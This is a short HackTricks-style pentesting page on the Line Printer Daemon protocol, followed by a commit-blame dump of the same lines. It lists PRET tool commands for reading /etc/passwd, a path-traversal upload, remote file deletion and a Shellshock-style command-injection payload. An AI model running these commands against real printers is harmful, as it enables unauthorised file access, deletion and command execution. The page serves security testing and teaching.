hacktricks/pentesting/515-pentesting-line-printer-daemon-lpd.md

# 515 - Pentesting Line Printer Daemon (LPD)

The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 80s (later specified by RFC1179).\
The daemon runs on port 515/tcp and can be accessed using the `lpr`command. To print, the client sends a **control file** defining job/username and a **data file** containing the actual data to be printed. The **input type** of the data file can be set in the control file by choosing among **various file formats**. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is LPRng. LPD can be used as a carrier to deploy **malicious PostScript** or **PJL print jobs**.&#x20;

The `lpdprint` and `lpdtest` tools are included in [**PRET**](https://github.com/RUB-NDS/PRET)**.** They are a minimalist way to print data directly to an LPD capable printer or download/upload/delete files and more:

```
lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local
```

If you want to learn more about [**hacking printers read this page**](pentesting-printers/).

## Shodan

* `port 515`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`# 515 - Pentesting Line Printer Daemon (LPD)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 80s (later specified by RFC1179).\`
GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			The daemon runs on port 515/tcp and can be accessed using the `lpr`command. To print, the client sends a control file defining job/username and a data file containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is LPRng. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs.
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			The `lpdprint` and `lpdtest` tools are included in [PRET](https://github.com/RUB-NDS/PRET). They are a minimalist way to print data directly to an LPD capable printer or download/upload/delete files and more:
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`lpdprint.py hostname filename`
GitBook: [master] 2 pages modified 2020-07-28 00:00:37 +00:00			`lpdtest.py hostname get /etc/passwd`
			`lpdtest.py hostname put ../../etc/passwd`
			`lpdtest.py hostname rm /some/file/on/printer`
			`lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'`
			`lpdtest.py hostname mail lpdtest@mailhost.local`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```

			`If you want to learn more about [hacking printers read this page](pentesting-printers/).`

GitBook: [master] 379 pages modified 2020-10-05 17:40:56 +00:00			`## Shodan`

			* `port 515`